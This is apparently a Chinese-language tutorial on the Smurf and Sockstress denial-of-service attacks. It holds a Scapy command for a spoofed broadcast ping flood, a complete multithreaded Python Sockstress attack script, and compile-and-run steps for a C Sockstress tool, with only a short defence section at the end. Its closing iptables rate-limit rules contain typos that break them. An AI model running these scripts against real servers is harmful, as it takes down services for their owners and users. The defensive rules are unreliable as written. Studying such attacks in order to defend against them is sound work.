Smurf攻击、Sockstress

Smurf攻击

• 世界上最古老的DDoS攻击技术

• 向广播地址发送伪造源地址的ICMP echo Request（ping）包

• LAN所有计算机向伪造源地址返回响应包

• 对现代操作系统已经失效（不响应目标为广播的ping）

• Scapy

i=IP()i.dst="1.1.1.255"p=ICMP()p.display()r=(i/p)send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
1

• 这个不演示了，仅仅当作学习原理，大家自己可以尝试下

Sockstress

• 2008年由Jack C.Louis发现

• 针对TCP服务的拒绝服务攻击

• 消耗被攻击目标系统资源

• 与攻击目标建立大量socket链接

• 完成三次握手，最后的ACK包window大小为0（客户端不接受数据）

• 攻击者资源消耗小(CPU、内存、带宽)

• 异步攻击，单机可拒绝服务高配资源服务器

• Window窗口实现的TCP流控

脚本如下：

#! /usr/bin/python# -*- coding: utf-8 -*-from scapy.all import *from time import sleepimport threadimport loggingimport osimport signalimport syslogging.getLogger("scapy.runtime").setLevel(logging.ERROR)if len(sys.argv) != 4:    print "用法：./syn_flood.py [IP地址] [端口] [线程数]"    print "举例：./syn_flood.py 1.1.1.1 80 20 ## 请确定被攻击端口处于开放状态"    sys.exit()target = str(sys.argv[1])dstport = int(sys.argv[2])threads = int(sys.argv[3])## 攻击函数def sockstress(target,dstport):    while 0 == 0:        try:            x = random.randint(0,65535)            response = sr1(IP(dst=target)/TCP(sport=x,dport=dstport,flags ='S'),timeout=1,verbose=0)            send(IP(dst=target)/ TCP(dport=dstport,sport=x,window=0,flags='A',ack=(response[TCP].seq + 1))/'\x00\x00',verbose=0)            except:                pass## 停止攻击函数def shutdown(signal, frame):    print '正在恢复 iptables 规则'    os.system('iptables -D OUTPUT -p TCP --tcp-flags RST RST -d ' + target + ' -j DROP')    sys.exit()## 添加iptables规则os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')signal.signal(signal.SIGINT,shutdown)##多线程攻击print "\n攻击正在进行...按Ctrl+C停止攻击"for X in range(0,threads):    thread.start_new_thread(sockstress, (target,dstport))##永远执行while 0 == 0:    sleep(1)
1

自己去执行尝试即可，这里不做详细演示；

C攻击脚本

• https://github.com/defuse/sockstress

• gcc -Wall -c sockstress.c

• gcc -pthread -o sockstress sockstress.o

• ./sockstress 1.1.1.1:80 eth0

• ./sockstress 1.1.11:80 eth0 -p payloads/http

防火墙规则：(用C的话提前写这个防火墙规则)

iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
1

防御措施

• 直到今天sockstress攻击仍然是一种有效的DoS攻击方式

• 由于建立完成的TCP三步握手，因此使用syn cookie防御无效

• 根本的防御方法是采用白名单（不实际）

• 折中对策：限制单位时间内每IP建立的TCP连接数

• 封杀每30秒与80端口建立连接超过10个的IP地址

iptables -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --setiptables -l INPUI -P tcp --dport 80 -m state --state NEW -m recent -- update --seconds 30 --hitcount 10 -j DROP
1

• 以上规则对DDoS攻击无效